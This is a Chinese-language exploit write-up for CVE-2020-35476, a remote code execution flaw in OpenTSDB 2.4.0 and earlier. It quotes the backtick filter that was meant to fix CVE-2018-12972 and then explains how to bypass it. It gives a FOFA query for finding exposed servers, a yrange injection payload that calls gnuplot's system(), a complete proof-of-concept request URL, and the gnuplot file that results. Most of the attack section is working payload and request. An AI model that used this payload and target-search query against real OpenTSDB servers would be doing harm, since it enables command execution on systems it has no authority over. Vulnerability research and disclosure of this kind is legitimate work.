CVE-2020-35476 OpenTSDB 2.4.0 远程代码执行

# CVE-2020-35476 OpenTSDB 2.4.0 远程代码执行

在OpenTSDB 2.4.0及更低版本中yrange参数发现了一个远程执行代码漏洞（其他参数可能也容易受到攻击）。

fofa：`title=”Opentsdb” ||body=”opentsdb_header.jpg”`

在 CVE-2018-12972 用 反引号 来进行命令注入，o=%60ls%60 官方引入如下函数来过滤，现在可以重新被绕过。

“`
// TODO – far from perfect, should help a little.
if *(given.contains(“`”) || given.contains(“%60”) ||
given.contains(“`”)) *{
throw new BadRequestException(“Parameter ” + param + ” contained a ”
+ “back-tick. That’s a no-no.”);
}
“`

/src/tsd/GraphHandler.java：

“`
private static String popParam(final Map> querystring,
final String param) {
final List params = querystring.remove(param);
if (params == null) {
return null;
}
final String given = params.get(params.size() – 1);
// TODO – far from perfect, should help a little.
if *(given.contains(“`”) || given.contains(“%60”) ||
given.contains(“`”)) *{
throw new BadRequestException(“Parameter ” + param + ” contained a ”
+ “back-tick. That’s a no-no.”);
}
return given;
}
“`

Bypass Payload:

“`
[33:system(‘touch/tmp/poc.txt’)]
“`

PoC：

“`
http://opentsdbhost.local/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(‘touch/tmp/poc.txt’)]&wxh=1516×644&style=linespoint&baba=lala&grid=t&json
“`

OpenTSDB在temp目录中创建的gnuplot文件如下所示：

“`
set term png small size 1516,644
set xdata time
set timefmt “%s”
if (GPVAL_VERSION < 4.6) set xtics rotate; else set xtics rotate right set output "/tmp/d705ba5b.png" set xrange ["972086400":"1603641404"] set format x "%Y/%m/%d" set grid set style data linespoint set key right box set ylabel "" *set yrange [33:system('touch /tmp/poc.txt')]* plot "/tmp/d705ba5b_0.dat" using 1:2 title "sys.cpu.nice{host=web01, dc=lga}" ``` 当OpenTSDB执行mygnuplot.sh的时候poc.txt文件将被写入到临时目录。 ref： * https://github.com/OpenTSDB/opentsdb/issues/2051 * https://xz.aliyun.com/t/2511 * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35476 * https://forum.ywhack.com/thread-114835-1-2.html